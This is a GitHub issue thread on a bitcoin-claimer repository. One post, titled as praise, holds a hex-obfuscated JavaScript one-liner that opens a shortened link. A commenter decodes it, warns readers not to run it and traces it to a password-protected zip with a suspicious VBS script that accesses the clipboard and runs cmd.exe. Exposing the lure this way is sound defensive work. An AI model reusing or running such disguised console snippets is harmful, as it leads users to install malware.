### ISSUE TITLE
Good Excellent code

### ISSUE THREAD

**Issue by Scripts4all** [vishakh567/fbtc-claimer#5]
var _0x4aa7=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x75\x74\x74\x2E\x6C\x79\x2F\x69\x35\x51\x6C\x70\x4D\x6E","\x6F\x70\x65\x6E"];window[_0x4aa7[1]] (_0x4aa7[0])

**Comment by DadiBit** [comment]
**TL;DR: DO NOT RUN IT IN YOUR BROWSER CONSOLE**

Deciphered for the curious ones: `window.open("https://cutt.ly/i5QlpMn")` (opens the link when run in a browser)

Currently pointing to: `https://telegra.ph/FreeBitcoin-Script2023-04-26`
Which is quite sketchy, but anyway... Opening the zip file we find a txt file (with a password... which was actually needed to open the zip in the first place wtf) vbs script (even more sus).

Now, guess what? It looks kind of fine, until you realize it's nearly *one megabyte* of code for a simple script that should work fine with a few hundreds lines of code. If you scroll a bit you even see it accesses the clipboard, runs `cmd.exe` and more crazy stuff... So, yeah, I actually had a lot of free time to waste for this thing lol.

---

Hex strings decoded with var renamed as mid-step to decipher:
```javascript
var array = [
  "https://cutt.ly/i5QlpMn",
  "open",
];
window[array[1]] (array[0])
```
